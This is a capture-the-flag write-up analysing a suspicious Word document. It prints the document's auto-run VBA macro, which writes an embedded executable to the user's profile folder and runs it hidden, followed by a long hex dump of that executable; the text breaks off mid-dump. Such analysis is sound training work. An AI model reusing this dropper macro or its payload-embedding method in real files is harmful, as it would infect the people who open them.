I"G¸<h1 id="notes-120-pts">Notes (120 pts)</h1>

<hr />

<h2 id="part-1--challenge-description">PART 1 : CHALLENGE DESCRIPTION</h2>

<div class="highlighter-rouge"><div class="highlight"><pre class="highlight"><code>CSIRT is notified that a staff received a suspicious Word file via email.
You are in charge of analyzing such files, and asked by your supervisor to investigate this Word file since it was determined to be suspicious based on a hearing survey.
Analyze this file and find a flag.

* These files do not cause any actual damage but may be detected by antivirus software. Make sure to turn off your antivirus software before analyzing the file.
Do not perform analysis in the company's premises.
* The password for the zip file to be downloaded is ‚Äúnssc2018‚Äù.

Flag format: flag{single-byte alphanumeric characters}
</code></pre></div></div>

<hr />

<h2 id="part-2--given-files">PART 2 : GIVEN FILES</h2>

<p>[&gt;] <a href="./files/ab84c90fc41c3da32ebcf55a0e8f3c02.zip">ab84c90fc41c3da32ebcf55a0e8f3c02.zip</a></p>
<ul>
  <li>ƒ®ÔøΩvÔøΩÔøΩÔøΩÔøΩÔøΩÔøΩÔøΩÔøΩ.doc</li>
</ul>

<hr />

<h2 id="part-3--getting-the-flag">PART 3 : GETTING THE FLAG</h2>

<p>Being a supposedly maliscious <strong>.doc</strong> file, the problem probably lies in a purposely added macro.</p>

<div class="language-console highlighter-rouge"><div class="highlight"><pre class="highlight"><code><span class="gp">$</span><span class="w"> </span>unzip ab84c90fc41c3da32ebcf55a0e8f3c02.zip 
<span class="go">
  Archive:  ab84c90fc41c3da32ebcf55a0e8f3c02.zip
  [ab84c90fc41c3da32ebcf55a0e8f3c02.zip] ƒ®ÔøΩvÔøΩÔøΩÔøΩÔøΩÔøΩÔøΩÔøΩÔøΩ.doc password: nssc2018
    inflating: ƒ®ÔøΩvÔøΩÔøΩÔøΩÔøΩÔøΩÔøΩÔøΩÔøΩ.doc

</span></code></pre></div></div>

<p>Fixing the file name of <strong><code class="highlighter-rouge">ƒ®ÔøΩvÔøΩÔøΩÔøΩÔøΩÔøΩÔøΩÔøΩÔøΩ.doc</code></strong> for easier operation:</p>

<div class="language-console highlighter-rouge"><div class="highlight"><pre class="highlight"><code><span class="gp">$</span><span class="w"> </span><span class="nb">ls</span>
<span class="go">
  ab84c90fc41c3da32ebcf55a0e8f3c02.zip  
</span><span class="gp">  'ƒ®'$</span><span class="s1">'\371''v'$'</span><span class="se">\3</span><span class="s1">04</span><span class="se">\3</span><span class="s1">73</span><span class="se">\3</span><span class="s1">54</span><span class="se">\3</span><span class="s1">07</span><span class="se">\3</span><span class="s1">11</span><span class="se">\3</span><span class="s1">23</span><span class="se">\3</span><span class="s1">73</span><span class="se">\2</span><span class="s1">45''.doc'</span>
<span class="go">
</span><span class="gp">$</span><span class="w"> </span><span class="nb">mv</span> <span class="s1">'ƒ®'$'</span><span class="se">\3</span><span class="s1">71''v'$'</span><span class="se">\3</span><span class="s1">04</span><span class="se">\3</span><span class="s1">73</span><span class="se">\3</span><span class="s1">54</span><span class="se">\3</span><span class="s1">07</span><span class="se">\3</span><span class="s1">11</span><span class="se">\3</span><span class="s1">23</span><span class="se">\3</span><span class="s1">73</span><span class="se">\2</span><span class="s1">45''.doc'</span> notes.doc
<span class="go">
</span></code></pre></div></div>

<p>Now, using <a href="./files/OfficeMalScanner.zip">OfficeMalScanner</a> to extract macros:</p>

<div class="language-console highlighter-rouge"><div class="highlight"><pre class="highlight"><code><span class="gp">$</span><span class="w"> </span>unzip OfficeMalScanner.zip
<span class="go">
  Archive:  OfficeMalScanner.zip
    inflating: Cadt.dll                
    inflating: DisView.exe             
    inflating: LZNT1Decompress.dll     
    inflating: MalHost-Setup.exe       
    inflating: OfficeMalScanner.exe    
    inflating: RTFScan.exe             
    inflating: Unzipper.dll

</span><span class="gp">$</span><span class="w"> </span>wine ./OfficeMalScanner.exe notes.doc info
<span class="go">
  +------------------------------------------+
  |           OfficeMalScanner v0.62         |
  |  Frank Boldewin / www.reconstructer.org  |
  +------------------------------------------+

  [*] INFO mode selected
  [*] Opening file notes.doc
  [*] Filesize is 114688 (0x1c000) Bytes
  [*] Ms Office OLE2 Compound Format document detected
  [*] Format type Winword

  ------------------------------------
  [Scanning for VB-code in NOTES.DOC]
  ------------------------------------
  NewMacros
  ThisDocument
  -----------------------------------------------------------------------------
                  VB-MACRO CODE WAS FOUND INSIDE THIS FILE!
                 The decompressed Macro code was stored here:

</span><span class="gp">  ------&gt;</span><span class="w"> </span>Z:<span class="se">\r</span>oot<span class="se">\D</span>esktop<span class="se">\N</span>OTES.DOC-Macros
<span class="go">  -----------------------------------------------------------------------------

</span></code></pre></div></div>

<p>There were two macros found but <strong><code class="highlighter-rouge">NewMacros</code></strong> contains a payload:</p>

<pre><code class="language-ps1">Attribute VB_Name = "NewMacros"
'**************************************************************
'*
'* This code is now split into two pieces:
'*  1. The Macro. This must be copied into the Office document
'*     macro editor. This macro will run on startup.
'*
'*  2. The Data. The hex dump at the end of this output must be
'*     appended to the end of the document contents.
'*
'**************************************************************
'*
'* MACRO CODE
'*
'**************************************************************

Sub Auto_Open()
    Attwi12
End Sub

Sub Attwi12()
    Dim Attwi7 As Integer
    Dim Attwi1 As String
    Dim Attwi2 As String
    Dim Attwi3 As Integer
    Dim Attwi4 As Paragraph
    Dim Attwi8 As Integer
    Dim Attwi9 As Boolean
    Dim Attwi5 As Integer
    Dim Attwi11 As String
    Dim Attwi6 As Byte
    Dim Jomwudqvne As String
    Jomwudqvne = "Jomwudqvne"
    Attwi1 = "YDoMAcDCKiW.exe"
    Attwi2 = Environ("USERPROFILE")
    ChDrive (Attwi2)
    ChDir (Attwi2)
    Attwi3 = FreeFile()
    Open Attwi1 For Binary As Attwi3
    For Each Attwi4 In ActiveDocument.Paragraphs
        DoEvents
            Attwi11 = Attwi4.Range.Text
        If (Attwi9 = True) Then
            Attwi8 = 1
            While (Attwi8 &lt; Len(Attwi11))
                Attwi6 = Mid(Attwi11, Attwi8, 4)
                Put #Attwi3, , Attwi6
                Attwi8 = Attwi8 + 4
            Wend
        ElseIf (InStr(1, Attwi11, Jomwudqvne) &gt; 0 And Len(Attwi11) &gt; 0) Then
            Attwi9 = True
        End If
    Next
    Close #Attwi3
    Attwi13 (Attwi1)
End Sub

Sub Attwi13(Attwi10 As String)
    Dim Attwi7 As Integer
    Dim Attwi2 As String
    Attwi2 = Environ("USERPROFILE")
    ChDrive (Attwi2)
    ChDir (Attwi2)
    Attwi7 = Shell(Attwi10, vbHide)
End Sub

Sub AutoOpen()
    Auto_Open
End Sub

Sub Workbook_Open()
    Auto_Open
End Sub

'**************************************************************
'*
'* PAYLOAD DATA
'*
'**************************************************************

Jomwudqvne
&amp;H4D&amp;H5A&amp;H90&amp;H00&amp;H03&amp;H00&amp;H00&amp;H00&amp;H04&amp;H00&amp;H00&amp;H00&amp;HFF&amp;HFF&amp;H00&amp;H00&amp;HB8&amp;H00&amp;H00&amp;H00&amp;H00&amp;H00&amp;H00&amp;H00&amp;H40&amp;H00&amp;H00&amp;H00&amp;H00&amp;H00&amp;H00&amp;H00&amp;H00&amp;H00&amp;H00&amp;H00&amp;H00&amp;H00&amp;H00&amp;H00&amp;H00&amp;H00&amp;H00&amp;H00&amp;H00&amp;H00&amp;H00&amp;H00&amp;H00&amp;H00&amp;H00&amp;H00&amp;H00&amp;H00&amp;H00&amp;H00&amp;H00&amp;H00&amp;H00&amp;H00&amp;HE0&amp;H00&amp;H00&amp;H00&amp;H0E&amp;H1F&amp;HBA&amp;H0E&amp;H00&amp;HB4&amp;H09&amp;HCD&amp;H21&amp;HB8&amp;H01&amp;H4C&amp;HCD&amp;H21&amp;H54&amp;H68&amp;H69&amp;H73&amp;H20&amp;H70&amp;H72&amp;H6F&amp;H67&amp;H72&amp;H61&amp;H6D&amp;H20&amp;H63&amp;H61&amp;H6E&amp;H6E&amp;H6F&amp;H74&amp;H20&amp;H62&amp;H65&amp;H20&amp;H72&amp;H75&amp;H6E&amp;H20&amp;H69&amp;H6E&amp;H20&amp;H44&amp;H4F&amp;H53&amp;H20&amp;H6D&amp;H6F&amp;H64&amp;H65&amp;H2E&amp;H0D&amp;H0D&amp;H0A&amp;H24&amp;H00&amp;H00&amp;H00&amp;H00&amp;H00&amp;H00&amp;H00&amp;HF1&amp;H3E&amp;H51&amp;HD7&amp;HB5&amp;H5F&amp;H3F&amp;H84&amp;HB5&amp;H5F&amp;H3F&amp;H84&amp;HB5&amp;H5F&amp;H3F&amp;H84&amp;HAE&amp;HC2&amp;HA3&amp;H84&amp;HB6&amp;H5F&amp;H3F&amp;H84&amp;HAE&amp;HC2&amp;HA1&amp;H84&amp;HB4&amp;H5F&amp;H3F&amp;H84&amp;HAE&amp;HC2&amp;H95&amp;H84&amp;HA6&amp;H5F&amp;H3F&amp;H84&amp;HAE&amp;HC2&amp;H94&amp;H84&amp;HB7&amp;H5F&amp;H3F&amp;H84&amp;HBC&amp;H27&amp;HAC&amp;H84&amp;HB7&amp;H5F&amp;H3F&amp;H84&amp;HB5&amp;H5F&amp;H3E&amp;H84&amp;H9F&amp;H5F&amp;H3F&amp;H84&amp;HAE&amp;HC2&amp;H90&amp;H84&amp;HB7&amp;H5F&amp;H3F&amp;H84&amp;HAE&amp;HC2&amp;HA2&amp;H84&amp;HB4&amp;H5F&amp;H3F&amp;H84&amp;H52&amp;H69&amp;H63&amp;H68&amp;HB5&amp;H5F&amp;H3F&amp;H84&amp;H00&amp;H00&amp;H00&amp;H00&amp;H00&amp;H00&amp;H00&amp;H00&amp;H50&amp;H45&amp;H00&amp;H00&amp;H4C&amp;H01&amp;H05&amp;H00&amp;H11&amp;HE5&amp;HD1&amp;H59&amp;H00&amp;H00&amp;H00&amp;H00&amp;H00&amp;H00&amp;H00&amp;H00&amp;HE0&amp;H00&amp;H02&amp;H01&amp;H0B&amp;H01&amp;H0A&amp;H00&amp;H00&amp;H0A&amp;H00&amp;H0
0&amp;H00&amp;H0E&amp;H00&amp;H00&amp;H00&amp;H00&amp;H00&amp;H00&amp;H59&amp;H13&amp;H00&amp;H00&amp;H00&amp;H10&amp;H00&amp;H00&amp;H00&amp;H20&amp;H00&amp;H00&amp;H00&amp;H00&amp;H40&amp;H00&amp;H00&amp;H10&amp;H00&amp;H00&amp;H00&amp;H02&amp;H00&amp;H00&amp;H05&amp;H00&amp;H01&amp;H00&amp;H00&amp;H00&amp;H00&amp;H00&amp;H05&amp;H00&amp;H01&amp;H00&amp;H00&amp;H00&amp;H00&amp;H00&amp;H00&amp;H60&amp;H00&amp;H00&amp;H00&amp;H04&amp;H00&amp;H00&amp;H36&amp;H22&amp;H00&amp;H00&amp;H03&amp;H00&amp;H40&amp;H81&amp;H00&amp;H00&amp;H10&amp;H00&amp;H00&amp;H10&amp;H00&amp;H00&amp;H00&amp;H00&amp;H10&amp;H00&amp;H00&amp;H10&amp;H00&amp;H00&amp;H00&amp;H00&amp;H00&amp;H00&amp;H10&amp;H00&amp;H00&amp;H00&amp;H00&amp;H00&amp;H00&amp;H00&amp;H00&amp;H00&amp;H00&amp;H00&amp;H64&amp;H22&amp;H00&amp;H00&amp;H3C&amp;H00&amp;H00&amp;H00&amp;H00&amp;H40&amp;H00&amp;H00&amp;HB4&amp;H01&amp;H00&amp;H00&amp;H00&amp;H00&amp;H00&amp;H00&amp;H00&amp;H00&amp;H00&amp;H00&amp;H00&amp;H00&amp;H00&amp;H00&amp;H00&amp;H00&amp;H00&amp;H00&amp;H00&amp;H50&amp;H00&amp;H00&amp;H50&amp;H01&amp;H00&amp;H00&amp;HD0&amp;H20&amp;H00&amp;H00&amp;H1C&amp;H00&amp;H00&amp;H00&amp;H00&amp;H00&amp;H00&amp;H00&amp;H00&amp;H00&amp;H00&amp;H00&amp;H00&amp;H00&amp;H00&amp;H00&amp;H00&amp;H00&amp;H00&amp;H00&amp;H00&amp;H00&amp;H00&amp;H00&amp;H00&amp;H00&amp;H00&amp;H00&amp;H40&amp;H21&amp;H00&amp;H00&amp;H40&amp;H00&amp;H00&amp;H00&amp;H00&amp;H00&amp;H00&amp;H00&amp;H00&amp;H00&amp;H00&amp;H00&amp;H00&amp;H20&amp;H00&amp;H00&amp;HB0&amp;H00&amp;H00&amp;H00&amp;H00&amp;H00&amp;H00&amp;H00&amp;H00&amp;H00&amp;H00&amp;H00&amp;H00&amp;H00&amp;H00&amp;H00&amp;H00&amp;H00&amp;H00&amp;H00&amp;H00&amp;H00&amp;H00&amp;H00&amp;H00&amp;H00&amp;H00&amp;H00&amp;H2E&amp;H74&amp;H65&amp;H78&amp;H74&amp;H00&amp;H00&amp;H00&amp;HAA&amp;H08&amp;H00&amp;H00&amp;H00&amp;H10&amp;H00&amp;H00&amp;H00&amp;H0A&amp;H00&amp;H00&amp;H00&amp;H04&amp;H00&amp;H00&amp;H00&amp;H00&amp;H00&amp;H00&amp;H00&amp;H00&amp;H00&amp;H00&amp;H00&amp;H00&amp;H00&amp;H00&amp;H20&amp;H00&amp;H00&amp;H
60&amp;H2E&amp;H72&amp;H64&amp;H61&amp;H74&amp;H61&amp;H00&amp;H00&amp;H30&amp;H06&amp;H00&amp;H00&amp;H00&amp;H20&amp;H00&amp;H00&amp;H00&amp;H08&amp;H00&amp;H00&amp;H00&amp;H0E&amp;H00&amp;H00&amp;H00&amp;H00&amp;H00&amp;H00&amp;H00&amp;H00&amp;H00&amp;H00&amp;H00&amp;H00&amp;H00&amp;H00&amp;H40&amp;H00&amp;H00&amp;H40&amp;H2E&amp;H64&amp;H61&amp;H74&amp;H61&amp;H00&amp;H00&amp;H00&amp;H88&amp;H03&amp;H00&amp;H00&amp;H00&amp;H30&amp;H00&amp;H00&amp;H00&amp;H02&amp;H00&amp;H00&amp;H00&amp;H16&amp;H00&amp;H00&amp;H00&amp;H00&amp;H00&amp;H00&amp;H00&amp;H00&amp;H00&amp;H00&amp;H00&amp;H00&amp;H00&amp;H00&amp;H40&amp;H00&amp;H00&amp;HC0&amp;H2E&amp;H72&amp;H73&amp;H72&amp;H63&amp;H00&amp;H00&amp;H00&amp;HB4&amp;H01&amp;H00&amp;H00&amp;H00&amp;H40&amp;H00&amp;H00&amp;H00&amp;H02&amp;H00&amp;H00&amp;H00&amp;H18&amp;H00&amp;H00&amp;H00&amp;H00&amp;H00&amp;H00&amp;H00&amp;H00&amp;H00&amp;H00&amp;H00&amp;H00&amp;H00&amp;H00&amp;H40&amp;H00&amp;H00&amp;H40&amp;H2E&amp;H72&amp;H65&amp;H6C&amp;H6F&amp;H63&amp;H00&amp;H00&amp;H9E&amp;H01&amp;H00&amp;H00&amp;H00&amp;H50&amp;H00&amp;H00&amp;H00&amp;H02&amp;H00&amp;H00&amp;H00&amp;H1A&amp;H00&amp;H00&amp;H00&amp;H00&amp;H00&amp;H00&amp;H00&amp;H00&amp;H00&amp;H00&amp;H00&amp;H00&amp;H00&amp;H00&amp;H40&amp;H00&amp;H00&amp;H42&amp;H00&amp;H00&amp;H00&amp;H00&amp;H00&amp;H00&amp;H00&amp;H00&amp;H00&amp;H00&amp;H00&amp;H00&amp;H00&amp;H00&amp;H00&amp;H00&amp;H00&amp;H00&amp;H00&amp;H00&amp;H00&amp;H00&amp;H00&amp;H00&amp;H00&amp;H00&amp;H00&amp;H00&amp;H00&amp;H00&amp;H00&amp;H00&amp;H00&amp;H00&amp;H00&amp;H00&amp;H00&amp;H00&amp;H00&amp;H00&amp;H00&amp;H00&amp;H00&amp;H00&amp;H00&amp;H00&amp;H00&amp;H00&amp;H00&amp;H00&amp;H00&amp;H00&amp;H00&amp;H00&amp;H00&amp;H00&amp;H00&amp;H00&amp;H00&amp;H00&amp;H00&amp;H00&amp;H00&amp;H00&amp;H00&amp;H00&amp;H00&amp;H00&amp;H00&amp;H00&amp;H00&amp;H00&amp;H00&amp;H00&amp;H00&amp;H00&amp;H00&amp;H00&amp;H00&amp;H00&amp;H00&amp;H00&amp;H00&amp;H00&amp;H00&amp;H00&amp;H00&amp;H00&amp;H00&amp;H00&amp;H00&amp;H00&amp;H00&amp;H00&amp;H00&amp;
H00&amp;H00&amp;H00&amp;H00&amp;H00&amp;H00&amp;H00&amp;H00&amp;H00&amp;H00&amp;H00&amp;H00&amp;H00&amp;H00&amp;H00&amp;H00&amp;H00&amp;H00&amp;H00&amp;H00&amp;H00&amp;H00&amp;H00&amp;H00&amp;H00&amp;H00&amp;H00&amp;H00&amp;H00&amp;H00&amp;H00&amp;H00&amp;H00&amp;H00&amp;H00&amp;H00&amp;H00&amp;H00&amp;H00&amp;H00&amp;H00&amp;H00&amp;H00&amp;H00&amp;H00&amp;H00&amp;H00&amp;H00&amp;H00&amp;H00&amp;H00&amp;H00&amp;H00&amp;H00&amp;H00&amp;H00&amp;H00&amp;H00&amp;H00&amp;H00&amp;H00&amp;H00&amp;H00&amp;H00&amp;H00&amp;H00&amp;H00&amp;H00&amp;H00&amp;H00&amp;H00&amp;H00&amp;H00&amp;H00&amp;H00&amp;H00&amp;H00&amp;H00&amp;H00&amp;H00&amp;H00&amp;H00&amp;H00&amp;H00&amp;H00&amp;H00&amp;H00&amp;H00&amp;H00&amp;H00&amp;H00&amp;H00&amp;H00&amp;H00&amp;H00&amp;H00&amp;H00&amp;H00&amp;H00&amp;H00&amp;H00&amp;H00&amp;H00&amp;H00&amp;H00&amp;H00&amp;H00&amp;H00&amp;H00&amp;H00&amp;H00&amp;H00&amp;H00&amp;H00&amp;H00&amp;H00&amp;H00&amp;H00&amp;H00&amp;H00&amp;H00&amp;H00&amp;H00&amp;H00&amp;H00&amp;H00&amp;H00&amp;H00&amp;H00&amp;H00&amp;H00&amp;H00&amp;H00&amp;H00&amp;H00&amp;H00&amp;H00&amp;H00&amp;H00&amp;H00&amp;H00&amp;H00&amp;H00&amp;H00&amp;H00&amp;H00&amp;H00&amp;H00&amp;H00&amp;H00&amp;H00&amp;H00&amp;H00&amp;H00&amp;H00&amp;H00&amp;H00&amp;H00&amp;H00&amp;H00&amp;H00&amp;H00&amp;H00&amp;H00&amp;H00&amp;H00&amp;H00&amp;H00&amp;H00&amp;H00&amp;H00&amp;H00&amp;H00&amp;H00&amp;H00&amp;H00&amp;H00&amp;H00&amp;H00&amp;H00&amp;H00&amp;H00&amp;H00&amp;H00&amp;H00&amp;H00&amp;H00&amp;H00&amp;H00&amp;H00&amp;H00&amp;H00&amp;H00&amp;H00&amp;H00&amp;H00&amp;H00&amp;H00&amp;H00&amp;H00&amp;H00&amp;H00&amp;H00&amp;H00&amp;H00&amp;H00&amp;H00&amp;H00&amp;H00&amp;H00&amp;H00&amp;H00&amp;H00&amp;H00&amp;H00&amp;H00&amp;H00&amp;H00&amp;H00&amp;H00&amp;H00&amp;H00&amp;H00&amp;H00&amp;H00&amp;H00&amp;H00&amp;H00&amp;H00&amp;H00&amp;H00&amp;H00&amp;H00&amp;H00&amp;H00&amp;H00&amp;H00&amp;H00&amp;H00&amp;H00&amp;H00&amp;H00&amp;H00&amp;H00&amp;H00&amp;H00&amp;H00&amp;H00&amp;H00&amp;H00&amp;H00&amp;H00&amp;H00&amp;H00&amp;H00&amp;H00
&amp;H00&amp;H55&amp;H8B&amp;HEC&amp;H81&amp;HEC&amp;H44&amp;H02&amp;H00&amp;H00&amp;HA1&amp;H00&amp;H30&amp;H40&amp;H00&amp;H33&amp;HC5&amp;H89&amp;H45&amp;HFC&amp;H56&amp;H57&amp;HB9&amp;H0F&amp;H00&amp;H00&amp;H00&amp;HBE&amp;HF4&amp;H20&amp;H40&amp;H00&amp;H8D&amp;H7D&amp;HBC&amp;HF3&amp;HA5&amp;H66&amp;HA5&amp;HA4&amp;HB9&amp;H61&amp;H00&amp;H00&amp;H00&amp;H33&amp;HF6&amp;H8B&amp;HFF&amp;HB8&amp;H85&amp;H10&amp;H42&amp;H08&amp;HF7&amp;HE1&amp;H8B&amp;HC1&amp;H2B&amp;HC2&amp;HD1&amp;HE8&amp;H03&amp;HC2&amp;HC1&amp;HE8&amp;H05&amp;H8B&amp;HD0&amp;HC1&amp;HE2&amp;H05&amp;H2B&amp;HD0&amp;H03&amp;HD2&amp;H8B&amp;HC1&amp;H2B&amp;HC2&amp;H8A&amp;H54&amp;H05&amp;HBC&amp;H88&amp;H94&amp;H35&amp;HBC&amp;HFE&amp;HFF&amp;HFF&amp;H46&amp;H81&amp;HC1&amp;H09&amp;H05&amp;H00&amp;H00&amp;H83&amp;HFE&amp;H1A&amp;H7C&amp;HCA&amp;H68&amp;H00&amp;H01&amp;H00&amp;H00&amp;H8D&amp;H85&amp;HBC&amp;HFD&amp;HFF&amp;HFF&amp;H6A&amp;H00&amp;H50&amp;HC6&amp;H84&amp;H35&amp;HBC&amp;HFE&amp;HFF&amp;HFF&amp;H00&amp;HE8&amp;H23&amp;H08&amp;H00&amp;H00&amp;H8D&amp;H8D&amp;HBC&amp;HFE&amp;HFF&amp;HFF&amp;H51&amp;H8D&amp;H95&amp;HBC&amp;HFD&amp;HFF&amp;HFF&amp;H68&amp;H34&amp;H21&amp;H40&amp;H00&amp;H52&amp;HFF&amp;H15&amp;HA4&amp;H20&amp;H40&amp;H00&amp;H8D&amp;H85&amp;HBC&amp;HFD&amp;HFF&amp;HFF&amp;H50&amp;HFF&amp;H15&amp;H9C&amp;H20&amp;H40&amp;H00&amp;H8B&amp;H4D&amp;HFC&amp;H83&amp;HC4&amp;H1C&amp;H5F&amp;H33&amp;HCD&amp;H33&amp;HC0&amp;H5E&amp;HE8&amp;H04&amp;H00&amp;H00&amp;H00&amp;H8B&amp;HE5&amp;H5D&amp;HC3&amp;H3B&amp;H0D&amp;H00&amp;H30&amp;H40&amp;H00&amp;H75&amp;H02&amp;HF3&amp;HC3&amp;HE9&amp;H98&amp;H02&amp;H00&amp;H00&amp;H68&amp;H9E&amp;H15&amp;H40&amp;H00&amp;HE8&amp;H8C&amp;H04&amp;H00&amp;H00&amp;HA1&amp;H60&amp;H33&amp;H40&amp;H00&amp;HC7&amp;H04&amp;H24&amp;H2C&amp;H30&amp;H40&amp;H00&amp;HFF&amp;H35&amp;H5C&amp;H33&amp;H40&amp;H00&amp;HA3&amp;H2C&amp;H30&amp;H40&amp;H00&amp;H68&amp;H1C&amp;H30&amp;H40&amp;H00&amp;H68&amp;H20&amp;H30&amp;H40&amp;H00&amp;H68&amp;H18&amp;H30&amp;H40&amp;H00&amp;HFF&amp;H15&amp;H94&amp;H2
0&amp;H40&amp;H00&amp;H83&amp;HC4&amp;H14&amp;HA3&amp;H28&amp;H30&amp;H40&amp;H00&amp;H85&amp;HC0&amp;H79&amp;H08&amp;H6A&amp;H08&amp;HE8&amp;HA6&amp;H03&amp;H00&amp;H00&amp;H59&amp;HC3&amp;H6A&amp;H10&amp;H68&amp;H08&amp;H22&amp;H40&amp;H00&amp;HE8&amp;H0E&amp;H06&amp;H00&amp;H00&amp;H33&amp;HDB&amp;H39&amp;H1D&amp;H80&amp;H33&amp;H40&amp;H00&amp;H75&amp;H0B&amp;H53&amp;H53&amp;H6A&amp;H01&amp;H53&amp;HFF&amp;H15&amp;H2C&amp;H20&amp;H40&amp;H00&amp;H89&amp;H5D&amp;HFC&amp;H64&amp;HA1&amp;H18&amp;H00&amp;H00&amp;H00&amp;H8B&amp;H70&amp;H04&amp;H89&amp;H5D&amp;HE4&amp;HBF&amp;H74&amp;H33&amp;H40&amp;H00&amp;H53&amp;H56&amp;H57&amp;HFF&amp;H15&amp;H30&amp;H20&amp;H40&amp;H00&amp;H3B&amp;HC3&amp;H74&amp;H19&amp;H3B&amp;HC6&amp;H75&amp;H08&amp;H33&amp;HF6&amp;H46&amp;H89&amp;H75&amp;HE4&amp;HEB&amp;H10&amp;H68&amp;HE8&amp;H03&amp;H00&amp;H00&amp;HFF&amp;H15&amp;H34&amp;H20&amp;H40&amp;H00&amp;HEB&amp;HDA&amp;H33&amp;HF6&amp;H46&amp;HA1&amp;H70&amp;H33&amp;H40&amp;H00&amp;H3B&amp;HC6&amp;H75&amp;H0A&amp;H6A&amp;H1F&amp;HE8&amp;H36&amp;H03&amp;H00&amp;H00&amp;H59&amp;HEB&amp;H3B&amp;HA1&amp;H70&amp;H33&amp;H40&amp;H00&amp;H85&amp;HC0&amp;H75&amp;H2C&amp;H89&amp;H35&amp;H70&amp;H33&amp;H40&amp;H00&amp;H68&amp;HC8&amp;H20&amp;H40&amp;H00&amp;H68&amp;HBC&amp;H20&amp;H40&amp;H00&amp;HE8&amp;H7D&amp;H05&amp;H00&amp;H00&amp;H59&amp;H59&amp;H85&amp;HC0&amp;H74&amp;H17&amp;HC7&amp;H45&amp;HFC&amp;HFE&amp;HFF&amp;HFF&amp;HFF&amp;HB8&amp;HFF&amp;H00&amp;H00&amp;H00&amp;HE9&amp;HDD&amp;H00&amp;H00&amp;H00&amp;H89&amp;H35&amp;H34&amp;H30&amp;H40&amp;H00&amp;HA1&amp;H70&amp;H33&amp;H40&amp;H00&amp;H3B&amp;HC6&amp;H75&amp;H1B&amp;H68&amp;HB8&amp;H20&amp;H40&amp;H00&amp;H68&amp;HB0&amp;H20&amp;H40&amp;H00&amp;HE8&amp;H42&amp;H05&amp;H00&amp;H00&amp;H59&amp;H59&amp;HC7&amp;H05&amp;H70&amp;H33&amp;H40&amp;H00&amp;H02&amp;H00&amp;H00&amp;H00&amp;H39&amp;H5D&amp;HE4&amp;H75&amp;H08&amp;H53&amp;H57&amp;HFF&amp;H15&amp;H38&amp;H20&amp;H40&amp;H00&amp;H39&amp;H1D&amp;H84&amp;H33&amp;H40&amp;H00&amp;H74&amp;H19&amp;H68&amp;H84&amp;H33&amp;H
40&amp;H00&amp;HE8&amp;H5B&amp;H04&amp;H00&amp;H00&amp;H59&amp;H85&amp;HC0&amp;H74&amp;H0A&amp;H53&amp;H6A&amp;H02&amp;H53&amp;HFF&amp;H15&amp;H84&amp;H33&amp;H40&amp;H00&amp;HA1&amp;H1C&amp;H30&amp;H40&amp;H00&amp;H8B&amp;H0D&amp;H80&amp;H20&amp;H40&amp;H00&amp;H89&amp;H01&amp;HFF&amp;H35&amp;H1C&amp;H30&amp;H40&amp;H00&amp;HFF&amp;H35&amp;H20&amp;H30&amp;H40&amp;H00&amp;HFF&amp;H35&amp;H18&amp;H30&amp;H40&amp;H00&amp;HE8&amp;HC8&amp;HFD&amp;HFF&amp;HFF&amp;H83&amp;HC4&amp;H0C&amp;HA3&amp;H30&amp;H30&amp;H40&amp;H00&amp;H39&amp;H1D&amp;H24&amp;H30&amp;H40&amp;H00&amp;H75&amp;H37&amp;H50&amp;HFF&amp;H15&amp;H84&amp;H20&amp;H40&amp;H00&amp;H8B&amp;H45&amp;HEC&amp;H8B&amp;H08&amp;H8B&amp;H09&amp;H89&amp;H4D&amp;HE0&amp;H50&amp;H51&amp;HE8&amp;H64&amp;H03&amp;H00&amp;H00&amp;H59&amp;H59&amp;HC3&amp;H8B&amp;H65&amp;HE8&amp;H8B&amp;H45&amp;HE0&amp;HA3&amp;H30&amp;H30&amp;H40&amp;H00&amp;H33&amp;HDB&amp;H39&amp;H1D&amp;H24&amp;H30&amp;H40&amp;H00&amp;H75&amp;H07&amp;H50&amp;HFF&amp;H15&amp;H8C&amp;H20&amp;H40&amp;H00&amp;H39&amp;H1D&amp;H34&amp;H30&amp;H40&amp;H00&amp;H75&amp;H06&amp;HFF&amp;H15&amp;H90&amp;H20&amp;H40&amp;H00&amp;HC7&amp;H45&amp;HFC&amp;HFE&amp;HFF&amp;HFF&amp;HFF&amp;HA1&amp;H30&amp;H30&amp;H40&amp;H00&amp;HE8&amp;HD7&amp;H04&amp;H00&amp;H00&amp;HC3&amp;HB8&amp;H4D&amp;H5A&amp;H00&amp;H00&amp;H66&amp;H39&amp;H05&amp;H00&amp;H00&amp;H40&amp;H00&amp;H74&amp;H04&amp;H33&amp;HC0&amp;HEB&amp;H35&amp;HA1&amp;H3C&amp;H00&amp;H40&amp;H00&amp;H81&amp;HB8&amp;H00&amp;H00&amp;H40&amp;H00&amp;H50&amp;H45&amp;H00&amp;H00&amp;H75&amp;HEB&amp;HB9&amp;H0B&amp;H01&amp;H00&amp;H00&amp;H66&amp;H39&amp;H88&amp;H18&amp;H00&amp;H40&amp;H00&amp;H75&amp;HDD&amp;H83&amp;HB8&amp;H74&amp;H00&amp;H40&amp;H00&amp;H0E&amp;H76&amp;HD4&amp;H33&amp;HC9&amp;H39&amp;H88&amp;HE8&amp;H00&amp;H40&amp;H00&amp;H0F&amp;H95&amp;HC1&amp;H8B&amp;HC1&amp;H6A&amp;H01&amp;HA3&amp;H24&amp;H30&amp;H40&amp;H00&amp;HFF&amp;H15&amp;H64&amp;H20&amp;H40&amp;H00&amp;H59&amp;H6A&amp;HFF&amp;HFF&amp;H15&amp;H28&amp;H20&amp;H40&amp;H00&amp;H8B&amp;H0D&amp;
